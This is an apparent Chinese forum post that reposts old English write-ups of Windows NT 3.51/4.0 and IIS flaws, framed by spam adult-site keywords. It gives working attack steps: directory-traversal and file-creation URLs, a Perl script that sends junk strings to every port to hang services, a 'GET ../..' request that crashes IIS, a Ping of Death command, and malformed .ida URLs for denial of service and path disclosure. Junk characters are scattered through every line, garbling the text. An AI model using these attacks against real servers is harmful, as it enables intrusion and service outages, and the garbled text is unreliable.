久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

    1. <sub id="9pxky"></sub>
    2. <small id="9pxky"></small>

           找回密碼
           注冊

          QQ登錄

          只需一步,快速開始

          NT的漏洞及描述(英文)

          [復(fù)制鏈接]
          1#
          發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
          受影響系統(tǒng):4.0,iis 1.01 {& z) z0 n" L4 L; N2 z
          A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
          0 y* o$ V* O3 E9 |8 b& D2 r1 G$ L. C6 Y6 M0 }) `' v+ l
          A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.5 G# b, c) B& h" B6 x/ P
          9 G% E$ c( V' C  j% W( W. t: Z1 W
          By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
          & K9 O7 |0 A1 N2 q
          5 C& E6 X% f" \--------------------------------------------------------------------
          # K* Y, Q: z" F$ G4 C1 w8 s" ]6 y  t
          9 F$ _8 x2 a" X. T) F受影響系統(tǒng):4.08 ]% H6 E  m1 u+ N' @& L3 T
          A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.! {- }) w& M0 Z4 x' O; O
          + ~* |, m' u4 r5 ]# i$ s
          If the file 'target.bat' exists, the file will be truncated.
          0 Y( D/ p( V& ?: Q. }6 P# r9 e9 G0 ~9 y* }* m1 g

          6 v' {5 v! ~1 w: K2 z9 @. KA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.' ~0 z9 Z/ l- C3 P; v$ }

          , A! |. d; i8 O  V4 E----------------------------------------------------------------------* {* i, v' i. _  Z4 R4 w5 @
          ) A+ a2 ^; q8 b" I) K/ w
          受影響系統(tǒng):3.51,4.0
          ; \! Q% E: y' R5 u* e6 w9 Y# DMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
          ( Z+ e) M, K7 q" Q! V
          : z; H9 g7 O/ B7 YThe following steps;% b# l4 ~; F8 {) O

            @4 l0 \* }' E$ d$ YTelnet to an NT 4.0 system on port 135
          ( ]; t; T' D0 @! {Type about 10 characters followed by a <CR> + }, y4 x. y) r4 Q4 u
          Exit Telnet ; p: N$ x+ L; ?  g8 J: G" j
          results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
            r' a& p/ ~' o* h
          4 k+ i; |$ [. T! ?' N* OWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
          # I( k/ C7 o2 f+ j' j' l- ^, k. X6 e+ ~" g+ Z8 v( h# A/ ]
          The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.9 u/ o) n. @1 ]+ C3 p
          $ F, E0 O9 @8 w5 H" V+ g
          If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning." F' L- K; f. L1 `3 T: }6 {

          " U/ ?; m6 X$ sThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):$ l& @$ b+ J% [5 l

          + x5 i# y! g% ~* w3 v/*begin poke code*/
          % U, O3 R& Y, Q5 C7 H; S8 O  T$ @5 v1 P' o& Y* w
          use Socket;
          ' E8 B" u: f. E+ Muse FileHandle;& H. F5 k9 L7 L. L9 R: Q- v) g
          require "chat2.pl";0 g( `7 S/ X( [  d/ l6 N

          ) t1 j0 [  f3 {2 v/ _$systemname = $ARGV[0] && shift;
          2 K% @- m4 M$ J
          # S6 ?- s8 k! p9 f% N$verbose = 1; # tell me what you're hitting2 P: f% @4 p. J- @8 P
          $knownports = 1; # don't hit known problem ports
          4 d9 M6 {; M" L* \for ($port = $0; $port<65535; $port++) . V  N& e/ |) I5 h4 l
          {- J3 x. v  V9 b5 @5 N( `
          & [4 I8 y6 {! S
            N  c) e3 x/ {. f4 b
          if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
          , f2 N% }! Y% Onext;
          + B" F2 x* O/ J: f}
          " a% X# A& N! E. C* l$fh = chat::open_port($systemname, $port);
          2 \+ y- E$ L3 w: \" p$ p7 Xchat::print ($fh,"This is about ten characters or more");
          / C0 p  k* u, r( O2 @if ($verbose) {
          # n$ J! e- A2 p  e* Z- _print "Trying port: $port\n";
          ) ^0 N6 U% e- q# d) I  L}
          ( E" Q% r2 Z5 Fchat::close($fh);
          4 ?/ T3 C( i$ C# \/ o8 Q0 Z; U( t5 O: S; F4 G8 _& O, C/ ]0 h' b0 y
          }3 c+ J3 B9 C, N" |7 {
          9 E) ?" y+ y3 o& ^- Y) a' M1 o* R
            j: Z+ K' m$ v/ D8 }$ U5 m  P" L, A
          /*end poke code*/
          " ~/ m7 Q1 A7 ^9 j+ ?5 e0 w8 O: N4 r& [
          Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
          3 a! t; R! p' I$ Z
          " G% N! `: M9 U6 ?. K--------------------------------------------------------------------------------
          8 F8 P% B4 {( q; T) _; j4 @0 k1 s3 c/ }& R- Y. q" W% ?
          受影響系統(tǒng):4.0
          % j. b9 R5 z  a8 E8 k1 aUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.- G) Y) ^" T# e) Q

          4 o3 x% U7 k7 GThis attack causes Dr. Watson to display an alert window and to log an error:
          ; `/ a4 Q6 ^, s8 o2 I$ J/ u2 i7 A: a5 S7 A. L
          "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"3 C1 L8 v7 }+ n
          2 i- e9 C) _0 M0 k: W
          --------------------------------------------------------------------------------
          0 b% z5 m3 d6 Y) T5 x0 Y$ S- K; g
          受影響系統(tǒng):3.51,4.0
          3 R8 [7 u, d; o. a5 pLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
            [6 f* c+ H+ ]! i8 o
            }+ E9 H/ x3 k  rSTOP: 0X0000001E
          - ~, X! x/ \6 {! Z" t. nKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS6 @! F+ L* x4 v
          , f1 \: d, ^! x1 H9 d; M
          -OR-
          ( G* u; w! W+ T. c6 Y& B! H& l# v
          / J1 W# ~3 H, g6 {! @STOP: 0x0000000A
            t3 R# S: c' r% @1 l. I3 XIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
          * w* E# \( n$ Y9 T' ]2 k. c  U( ]# A" Q- k- A
          NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
          5 r7 c; ^2 R7 N1 z3 W9 H  T, l: B
          2 p' f# D9 y/ ^7 P5 Y--------------------------------------------------------------------------------
          ) ]/ \! G6 `4 ?" V& T: t8 K) ?) x# b. R* P& j# E  ?6 |2 c
          Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
          $ J7 A3 I- x! }5 l+ L6 Q) L0 ~& }
          5 h' n' v3 B9 v$ Q* Z--------------------------------------------------------
          8 A! ]3 ?: i; g
          9 R/ c5 }* u" zIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
          您需要登錄后才可以回帖 登錄 | 注冊

          本版積分規(guī)則

          QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

          GMT+8, 2025-4-15 17:33

          Powered by Discuz! X3.5

          © 2001-2025 Discuz! Team.

          快速回復(fù) 返回頂部 返回列表